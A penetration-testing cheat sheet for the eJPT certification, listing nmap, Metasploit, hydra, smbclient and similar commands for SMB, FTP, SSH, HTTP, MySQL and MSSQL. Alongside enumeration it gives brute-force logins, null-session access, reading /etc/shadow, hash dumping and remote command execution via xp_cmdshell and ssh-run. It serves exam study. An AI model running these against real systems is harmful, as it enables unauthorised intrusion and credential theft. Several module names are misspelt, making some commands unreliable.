eJPT-CheatSheets
Bartosz Pokrywka
Usefull info and commands for eJPT cert exam
Server Message Block
- 445
- 139 (usually setups the session for the SMB)
- Connect drive: net use Z: \\IP\C$ pass /user:user
- Unconnect drive: net use * /delete
> nmap -p445 --script smb-protocols target
> nmap -p445 --script smb-security-mode target
> nmap -p445 --script smb-enum-sessions --script-args smbusername=username,smbpassword=password target
> nmap -p445 --script smb-enum-shares target
IPC - a null session, annonymous session
> nmap -p445 --script smb-enum-users target
If a Guest account is evident, then the SMB Service is misconfigured (guest account is dangerous)
> nmap -p445 --script smb-server-stats target
> nmap -p445 --script smb-enum-domains target
> nmap -p445 --script smb-enum-groups target
> nmap -p445 --script smb-enum-services target
> nmap -p445 --script smb-enum-shares,smb-ls target
> nmap -p445 --script smb-os-discovery target
Allows users to enumerate samba share. Allows file upload/download/delete. Permission enumeration (writable share, meet Metasploit), etc.
- -u username
- -p password (empty parenthesis if no password "")
- -d directory
- -H host
Example:
> smbmap -u guest -p "" -d . -H target
- -x run a command
- -L list contents
- -r list contents of specified drive (-r "C$")
- --upload self-explainatory
- --download self-explainatory
SMB Version
> use auxiliary/scanner/smb/smb_version
> show options
> set rhosts *IP*
> run/exploit
SMB Enum Shares
> use auxiliary/scanner/smb/smb_enumshares
SMB Dictionary Attack
> use auxiliary/scanner/smb/smb_login
SMB Enum Pipes
> use auxiliary/scanner/smb/pipe_auditor
> nmblookup -A IP (lookup by ip)
If we see <20>, that means we got server that we can connect to.
- -L IP (list by host)
Example:
> smbclient -L IP -N (null session)
> smbclient //IP/Public -N
> smbclient //IP/Public -U username
> rpcclient -U "" -N target (null session)
- srvinfo (server info)
- enumdomusers (enum user list)
- lookupnames (enum SID from user)
- enumdomgroups
- enumprinters
- -o (enum operating system info)
- -U (enum user list)
- -S (enum shares)
- -G (enum groups)
- -i (enum printers)
Enum for SIDs
- -r -u username -p password target
SMB Dictionary Attack
> hydra -l admin -P (password list file) target smb
> ftp target (try to find out if anonymous login is accepted)
> nmap target -p21 --script ftp-anon
> hydra -L loginlist -P passlist target ftp
> nmap target --script ftp-brute --script-args userdb=userlist -p21
> wget -m --no-passive ftp://anonymous:anonymous@targetIP
Use to get the banner enumeration (system version, operating system)
> nc target 22
For enumerating algorythms for generating a key:
> nmap target -p 22 --script ssh2-enum-alogs
For enumerating ssh-rsa host key:
> nmap target -p 22 --script ssh-hostkey --script-args ssh_hostkey=full
Look for supported auth methods:
> nmap target -p 22 --script ssh-auth-methods --script-args="ssh.user=student"
> nmap target -p 22 --script ssh-auth-methods --script-args="ssh.user=admin"
- etc.
Runs remote command on ssh server and returns command output:
> nmap target -p 22 --script ssh-run --script-args="ssh-run.cmd=ls -l /, ssh-run.username=username, ssh-run.password=password"
Hydra
> hydra -l student -P wordlist.txt target *ssh*
nmap
>nmap target -p 22 --script ssh-brute --script-args userdb=userlist
MSFconsole
> use auxiliary/scanner/ssh/ssh_login
> show options
> whatweb
> http http:// target
> dirb (enum of website directories)
> browsh --startup-url target (if you only have a terminal to use)
Nmap:
> nmap target -p 80 --script http-enum
> nmap target -p 80 --script http-headers
> nmap target -p 80 --script http-methods --script-args http-methods.url-path=/somedir/
> nmap target -p 80 --script http-webdav-scan --script-args http-methods.url-path=/somedir/
Nmap:
> nmap target -p 80 -sV --script banner
MSFConsole:
> use auxiliary/scanner/http/http_version
> use auxiliary/scanner/http/brute_dirs
curl: curl target
lynx: lynx target
MSFConsole:
> use auxiliary/scanner/http/robots_txt
Port 3306 usually ties to mysql service.
> mysql -h target -u root
> show databases;
> use books; (database name)
> select count(*) from authors; (count of items)
> select * from authors; (select items from database)
> help (show options what you have)
Scripting:
> select load_file("/etc/shadow");
- Enumerate writable databases
> use auxiliary/scanner/mysql/mysql_writable_dirs
> set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
> setg (sets variable as a global variable for msf session)
> set password "" (sets an empty password)
- Hash dump for a specified username
> use auxiliary/scanner/mysql/mysql_hashdump
Checks for an empty password user:
> nmap target -sV -p 3306 --script=mysql-empty-password
Enumeration:
> nmap target -sV -p 3306 --script=mysql-info
Enumeration for users:
> nmap target -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=' ' "
Enumeration for databases:
> nmap target -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=' ' "
Enumeration for variables, most interesting is 'datadir', where variables are stored:
> nmap target -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=' ' "
Audit for finding loopholes:
> nmap target -sV -p 3306 --script=mysql-audit --script-args "mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
Enumeration for hashes:
> nmap target -sV -p 3306 --script=mysql-dump-hashes --script-args='username=root,password='
Enumeration for items from database:
> nmap target -sV -p 3306 --script=mysql-query --script-args="query='select * from books.authors;',username='root',password=' '"
Check for annonymous login:
> nmap target -sV -p 3306 --script=mysql-empty-password
msfconsole:
> use auxiliary/scanner/mysql/mysql_login
> set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passowrds.txt
> set stop_on_success true
hydra:
> hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passowrds.txt target mysql
Common port is 1433
Enumerate basic info:
> nmap target -p 1433 --script ms-sql-info
> nmap target -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433
Brute force:
> nmap target -p 1433 --script ms-sql-brute --script-args userdb=userlist, passdb=passlist
Empty password:
> nmap target -p 1433 --script ms-sql-empty-password
Query:
> nmap target -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=password,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt (it's worth outputing this to a file, cause query in terminal is messy...)
Hashes:
> nmap target -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=password
Scripting:
> nmap target -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=password,ms-sql-xp-cmdshell.cmd=ipconfig
> nmap target -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=password,ms-sql-xp-cmdshell.cmd="type c:flag.txt" (windows **type** = linux **cat**)
Brute:
> use auxiliray/scanner/mssql/mssql_login
> set user_file (userlist/wordlist)
> set pass_file (passlist/common_pass)
Enum:
> use auxiliray/admin/mssql/mssql_enum
SQL Logins:
> use auxiliray/admin/mssql/mssql_enum_sql_logins
Commands:
> use auxiliray/admin/mssql/mssql_exec
Enum domain accounts:
> use auxiliray/admin/mssql/mssql_enum_domain_accounts